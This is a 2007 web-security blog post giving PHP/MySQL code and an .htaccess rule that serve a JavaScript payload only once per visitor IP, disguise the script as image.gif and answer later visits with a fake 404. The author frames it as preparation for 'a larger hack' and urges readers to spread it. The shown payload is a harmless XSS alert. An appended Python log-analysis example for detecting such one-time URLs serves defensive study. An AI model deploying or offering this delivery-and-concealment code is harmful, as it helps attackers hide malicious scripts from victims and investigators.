Benjamin Flesch = definitely rocks. One-Time executing JavaScript Payload HOWTO ~ mybeNi websecurity, web security and hack stuff.


One-time executing JavaScript Payload

March 21st, 2007

Lately I was preparing a larger hack and I needed a Javascript code which is executed only once per user and IP address, no matter how often the box is going to visit my homepage.

I haven’t seen such a script anywhere before, so I thought sharing my solution with others who might have the same problem would be nice.

Okay let’s go, here is my approach in PHP (using MySQL):

  1. "Call" the Javascript file from a normal HTML document via
    <script src="http://path.to.my.script/script.js"></script>
  2. Use a MySQL table to store the md5 hash of each visitor's IP address
  3. Compare the current IP hash with the hashes in the database. There are two possible results:
    1. IP already stored (user has visited before):
      Serve a 404 Error Document
    2. IP not stored yet (user visits for the first time):
      Serve the Javascript code and add the hash to the database

Huh, that wasn’t that terribly difficult, was it? ;-)

Let’s have a look at the PHP script serve_payload.php:

<?php
$user = 'db_user';
$pass = 'db_pass';
$db_name = 'name_of_database';

// connecting to database
$mysql_id = @mysql_connect('localhost', $user, $pass);
mysql_select_db($db_name);

// md5 hash of the visitor's IP address
$ip = md5($_SERVER['REMOTE_ADDR']);

// check whether the IP hash already exists in the database
$result = mysql_query("SELECT `adress` FROM `iplist` WHERE `adress`='$ip'") or die(mysql_error());

if (mysql_num_rows($result) == 0) {
    // IP not in database -> inserting it
    mysql_query("INSERT INTO `iplist` VALUES('$ip')") or die(mysql_error());

    /*
    Javascript Payload beneath this point (in this case a proper HTML document, not a .js file, but I hope you get the point).
    */
?>
<html>
<script>alert('tricky XSS');</script>
</html>
<?php
} else {
    // the 404 error document
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL was not found on this server.<P>
</BODY></HTML>
<?php
}
// finish
mysql_close();
?>

The table `iplist` in your database should look like this:

CREATE TABLE `iplist` (
  `adress` varchar(32) NOT NULL default ''
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

And additionally some mod_rewrite stuff for obfuscation purposes, save this into a .htaccess file and place it in the same directory as the PHP script:

RewriteEngine On
RewriteRule ^image.gif$ /mybeNi/hacks/one-time_js_execution/serve_payload.php

(Of course you've got to replace the /mybeNi/blah/ directories with your "own" script path)

Now you’re finished and your own one-time JavaScript Payload is up and running.

You may test my example Javascript Payload (executed only once). Now fellows, go and spread yourselves all over the world and have fun with it ;-)
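For anyone hunting this behaviour in web proxy logs, here is an added detection example (not part of the original post). It flags URLs whose first response to each client differs from every later one while new clients still receive the first-visit response, and notes image extensions served as non-image content. The log format, host names and byte counts are constructed, and because serve_payload.php sends its 404 page without a 404 status header, the comparison uses status plus body size.

```python
from collections import defaultdict

# Constructed proxy log (not from the post):
# time, client, URL, status, body bytes, Content-Type
SAMPLE_LOG = """\
10:00:01 10.0.0.5 http://site.example/image.gif 200 58 text/html
10:00:09 10.0.0.5 http://site.example/image.gif 200 212 text/html
10:01:00 10.0.0.5 http://site.example/news.html 200 900 text/html
10:01:05 10.0.0.7 http://site.example/news.html 200 900 text/html
10:05:12 10.0.0.7 http://site.example/image.gif 200 58 text/html
10:06:40 10.0.0.7 http://site.example/image.gif 200 212 text/html
10:07:00 10.0.0.5 http://site.example/news.html 200 950 text/html
10:07:30 10.0.0.7 http://site.example/news.html 200 950 text/html
10:08:00 10.0.0.5 http://site.example/logo.gif 200 4301 image/gif
"""
IMAGE_EXT = (".gif", ".png", ".jpg", ".jpeg")

def parse(log):
    """Yield (line_no, client, url, (status, size), content_type) in log order."""
    for n, line in enumerate(log.splitlines()):
        p = line.split()
        if len(p) == 6 and p[3].isdigit() and p[4].isdigit():  # skip malformed
            yield n, p[1], p[2], (int(p[3]), int(p[4])), p[5]

def find_one_time_urls(log):
    """Map each suspicious URL to the list of reasons it was flagged."""
    history = defaultdict(lambda: defaultdict(list))  # url -> client -> requests
    for n, client, url, fingerprint, ctype in parse(log):
        history[url][client].append((n, fingerprint, ctype))
    findings = {}
    for url, clients in history.items():
        # Clients whose first response differs from all later, identical ones.
        once = [s for s in clients.values() if len(s) > 1 and s[0][1] != s[1][1]
                and all(r[1] == s[1][1] for r in s[2:])]
        if len(once) < 2:
            continue
        # An edited page changes for everyone at one point in time. Here a new
        # client still gets the first-visit body after another got the fallback.
        first_change = min(s[1][0] for s in once)
        late = [s for s in once if s[0][0] > first_change]
        if not late:
            continue
        reasons = ["%d client(s) got the first-visit response late" % len(late)]
        types = sorted({s[0][2] for s in once})
        if url.lower().endswith(IMAGE_EXT) and not all(t.startswith("image/") for t in types):
            reasons.append("image extension served as " + ", ".join(types))
        findings[url] = reasons
    return findings
```

On the constructed log only image.gif is flagged; news.html changes for both clients at the same point in time, which is what an ordinary page update looks like.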




2 Responses to “One-time executing JavaScript Payload”:

  1. pdp Says:

    beNi,

    good idea but you complicate too much my friend :). all you need to do is to use one of the persistent storage functions, available in FF, IE and Opera, and flag the script as being already executed. When you come back to the same page you check the store and accept or decline whatever function execution.

    you can do the same thing with cookies. yes, someone can clear their cookies but, how often that happens really :)


  2. Kishor Says:

    Any reason why you wanted to do this?

